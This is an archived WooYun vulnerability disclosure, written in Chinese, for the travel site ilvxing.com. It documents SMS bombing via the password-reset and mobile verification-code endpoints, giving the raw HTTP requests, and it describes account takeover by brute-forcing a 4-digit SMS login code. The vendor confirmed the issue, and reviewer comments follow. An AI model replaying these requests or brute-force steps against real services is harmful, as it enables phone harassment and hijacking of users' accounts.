当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108961

漏洞标题:爱旅行官网多处短信轰炸+任意用户密码重置二+用户信息泄露

相关厂商:ilvxing.com

漏洞作者: 路人甲

提交时间:2015-04-20 12:21

修复时间:2015-06-04 16:14

公开时间:2015-06-04 16:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开

简要描述:

继续来一发 ,厂商说送礼物是真的还是假的哦,测试时候,浪费你们家20多条短信了

详细说明:

一 多处短信轰炸,(恶意利用一天几十万条短信不是问题吧)官网找回密码处和手机官网动态验证码登陆 http://m.ilvxing.com/usercenter/user/login(google浏览器,其他浏览器不兼容。。。。。。。)
以下为post包 一官网
POST /User/getPwd HTTP/1.1
Host: www.ilvxing.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ilvxing.com/User/login
Content-Length: 19
Cookie: reffer=http%3A%2F%2Fwww.ilvxing.com%2FUser%2Fresetpwd%2FNzE5MjE%3D; PHPSESSID=tobg081h8ulo8i8lhdha3vgv72; BII_UER_200=255e8f91-f7e3-0ec1-3fd2-3ef9bd9e72c1; BII_SEN_200=ae844658-5f05-ed92-21ce-546b5490fd76; Hm_lvt_943b1cce7d3ec9dbed9f503f471f5ae5=1429400705; Hm_lpvt_943b1cce7d3ec9dbed9f503f471f5ae5=1429401735
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
account=手机号
二手机上的官网(不用注册)
GET /common/getverifycode?phone=手机号 HTTP/1.1
Host: m.ilvxing.com
Proxy-Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.76 Safari/537.36
Referer: http://m.ilvxing.com/usercenter/user/login
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=t9e314h4uv7v5tbbegdvkgfe05; reffer=http%3A%2F%2Fm.ilvxing.com%2F; Hm_lvt_958966180e17ae3aec82a327c7bd7409=1429402445; Hm_lpvt_958966180e17ae3aec82a327c7bd7409=1429403598

55.png

漏洞证明:

二任意用户登陆 (http://m.ilvxing.com/usercenter/user/login)我是以手机动态验证码登陆的 估计其他位置一样的吧 4位数的 爆破分分钟

33.jpg

1.jpg

成功登陆

44.jpg


三登陆后修改密码 进官网看呗 信息还是有的

66.jpg


修复方案:

.。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-20 16:13

厂商回复:

感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-04-20 15:02 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    你这不是爆破吧,别跟我撞洞了……我帮你联系厂商了!

  2. 2015-04-20 15:06 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @疯狗 @xsser @浩天 @Finger http://wooyun.org/bugs/wooyun-2015-0108712/trace/7cee2cccdd70d6949ff0de84d67da772 http://wooyun.org/bugs/wooyun-2015-0108792/trace/5320b95fa13566817b767e52190c11bf http://wooyun.org/bugs/wooyun-2015-0109040/trace/240d1ae359f096054f24786b075bacab 求审核

  3. 2015-04-20 15:09 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人,在乌云学技术,去某数...)

    @疯狗 @xsser @浩天 @Finger 20号发的都过了,17号发的为啥不一起通过啊,而且还是同厂商啊(๑• . •๑)等下一不小心又撞洞了(ಥ_ಥ) 审核慢不要紧,就是怕别人先提交了……